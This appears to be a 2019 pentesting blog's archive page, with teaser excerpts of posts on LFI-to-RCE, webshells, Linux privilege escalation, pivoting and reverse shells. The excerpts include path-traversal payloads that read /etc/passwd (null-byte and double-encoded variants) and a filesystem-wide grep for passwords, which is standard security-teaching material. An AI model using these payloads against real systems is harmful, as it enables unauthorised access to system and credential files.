Monthly Archive: September 2019

cheatsheet lfi & rce 0

CHEATSHEET – LFI & RCE & WEBSHELLS

Basic LFI In the following examples, we include the /etc/passwd file, check the Directory & Path Traversal chapter for more interesting files. http://example.com/index.php?page=../../../etc/passwd Null byte ⚠️ In versions of PHP below 5.3.4 we can terminate with null byte. http://example.com/index.php?page=../../../etc/passwd%00 Double encoding http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00...

angel lfi to rce 0

WebShells & Exploitation – LFI to RCE

Commands can be sent to the web-shell using various methods, with HTTP POST request being the most common. However, hackers are not exactly people who play by the rules. The following are a few of the possible tricks...

shell____ 0

Web Shells & Exploitation Fundamentals

A web-shell is a malicious script used by an attacker with the intent to escalate and maintain persistent access on an already compromised web application. A web-shell itself cannot attack or exploit a remote vulnerability, so it is...

0

Linux Basic Enumeration

This blog is largely forked from the g0tmi1k’s blog https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Thanks, G0tm1lk for your amazing contribution to the industry. Operating System What’s the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release #...

Ninja 0

Linux Privilege Escalation – Part 2

In this blog, we will discuss detailed commands to escalate the privileges and find the user access to the files and folders. Files containing passwords grep –color=auto -rnw ‘/’ -ie “PASSWORD” –color=always 2> /dev/null find . -type f...

text 0

Linux Privilege Escalation – Part 1

In this blog, we will discuss about different Linux privilege escalation techniques & Methodologies. Tools LinuxSmartEnumeration – Linux enumeration tools for pentesting and CTFswget “https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh” -O lse.sh curl “https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh” -o lse.sh ./lse.sh -l1 # shows interesting information that...

0

Searchsploit Cheat Sheet

Searchsploit an exploit search tool by Offensive Security, Unix Ninja & G0tmi1k. It allows you to take a copy of Exploit Database with you. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out...

pivot 0

Pivoting & Port forwarding

This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog : – windows Netsh SSH proxychains Web Socks Metasploit sshuttle chisel Rpivot Plink Ngrok Windows Netsh Port Forwarding netsh interface...

terminal 0

Reverse Shell Cheat Sheet

This is a detailed cheat sheet of How to take the reverse shell via various methods. Here is the list of methods:- Bash TCP BASH UDP Python SOCAT Php Telnet Perl Ruby Golang Netcat Ncat Openssl awk Powershell...